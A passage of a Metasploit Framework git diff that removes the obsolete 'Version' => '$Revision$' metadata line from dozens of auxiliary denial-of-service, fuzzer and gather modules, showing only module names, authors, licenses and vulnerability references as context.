Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # patrickw - I am not sure if these are correct, but the closest match! diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index 86ac49772f..04ef0fa8f7 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary 'Brett Gervasoni', # original discovery 'jduck' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 8dff574e01..1cab306c3e 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'Masashi Fujiwara' #metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49303'], diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 989cad7ce4..8d549514a7 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Paulino Calderon ', #metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2227' ], diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 9185f729e7..ccb871e447 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ], diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index bccf0704c9..d92c36f73b 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Auxiliary 'Christian Mehlmauer ' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.ocert.org/advisories/ocert-2011-003.html'], diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 4551950c08..a18b172987 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '35145' ], #[ 'CVE', '' ], # no CVE? diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index cd1a70b018..34f83072e2 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '30644'], [ 'CVE', '2008-3656'], diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 22070a0a88..ec0d44cce2 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5081' ], [ 'OSVDB', '50929' ], diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index e3a8f6181e..fc606c9845 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '37255' ], diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index ac92e69d86..d50494af30 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '5807' ], diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index 5ce9593f14..0bc8a9cedd 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index c02dde0451..ab69b99576 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index df4c7ed467..787f7a6140 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'jfa', # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3486' ], diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 99a01258a8..381a4dda6f 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 14f3dacc54..f0eddba31c 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary bytes can be used, limiting the likelihood for arbitrary code execution. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '2577' ], diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 712726060b..e03ac458d7 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'Optyx ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4797' ], diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 8975a00416..58df110d2b 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1386' ], diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index c15e9a4629..b3aad945a1 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3200'], diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index 2352e42071..73dea9fbe5 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary (external/ruby-lorcon/README) for more information. }, 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index e6870ba9a8..c46e0aee08 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary (external/ruby-lorcon/README) for more information. }, 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb index 359fb63bd6..4680e449e0 100644 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index de6ec7d0a4..80d9656c34 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'guiness.stout ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6509'], diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 4c682d2f99..de82b21fb9 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'License' => MSF_LICENSE, 'Author' => 'hdm', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2514' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 36b89523b8..7c1e44ab82 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '15346' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index b87a9aac17..980e67397f 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '21542' ], diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index 8739ab1801..557d391470 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4572' ], diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 36ccebcec5..4b88ce4fbf 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3972' ], diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index d0ae038af7..88be5f2f0f 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r', #Metasploit edit/commit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '16204' ], diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 3c051fa0e6..62388c5d55 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6082'], diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 15243d32a4..890ad99235 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2031' ], diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index 6a3ce7c254..5c566c34e7 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5666' ], diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index c3f8aceff4..e21cc652d2 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5626'], diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index 7059e5b82f..ae96c119ae 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5626'], [ 'OSVDB', '50837'], diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index 105ff5a485..2f12569f74 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ["Sil3nt_Dre4m"], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ] diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index bbf8c29ba8..490ef0cced 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Leandro Oliveira ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1899' ], diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index df1027ed2a..5096c211ef 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6938'], [ 'OSVDB', '49998'], diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index 31c6ff687b..feece39a11 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0657' ], diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index f94348f2cc..8cf3c34453 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '30096'], diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index c0fad55612..46082ee749 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2120' ], diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index e074974619..98d416652d 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['BID', '19215'], diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index 97693a41c3..206df1f4fc 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '27644' ], diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index cd837b0d29..2bcb0c0a5f 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS09-001'], diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 60143c163c..3d547e0a7d 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'Laurent Gaffie ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-3103'], diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index cd98f9e624..fac7e2713e 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3103'], diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index d7a232b869..dcce89b116 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64340'], diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index bddcb44fce..38c7bf54ff 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64341'], diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 96405495c0..618653e912 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '17908'], diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index bc48fa2222..b6c8effd87 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1311'], diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 48b8e78e12..3ada21a895 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'Nullthreat', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2115' ], diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index d2cc3f001e..568d3d0403 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3389'], diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index c22f5cd104..ce5e2c691d 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['joernchen (Phenoelit)'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1140'], diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index eb36776636..bd79aa3099 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1562' ], diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index 3a871d71d4..e202281f9e 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 2909191044..2666425f3e 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary 'Paulino Calderon ' #Added cookie handling ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL','http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer'], diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index eb7921ccde..b76258cf25 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP Simple Fuzzer', - 'Version' => '$Revision$', 'Description' => 'SMTP Simple Fuzzer', 'References' => [ diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index efd9538a22..6e374cc4f4 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Android Content Provider File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a cross-domain issue within the Android web browser to exfiltrate files from a vulnerable device. @@ -25,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary 'Thomas Cannon', # Original discovery, partial disclsoure 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/gather/citrix_published_applications.rb 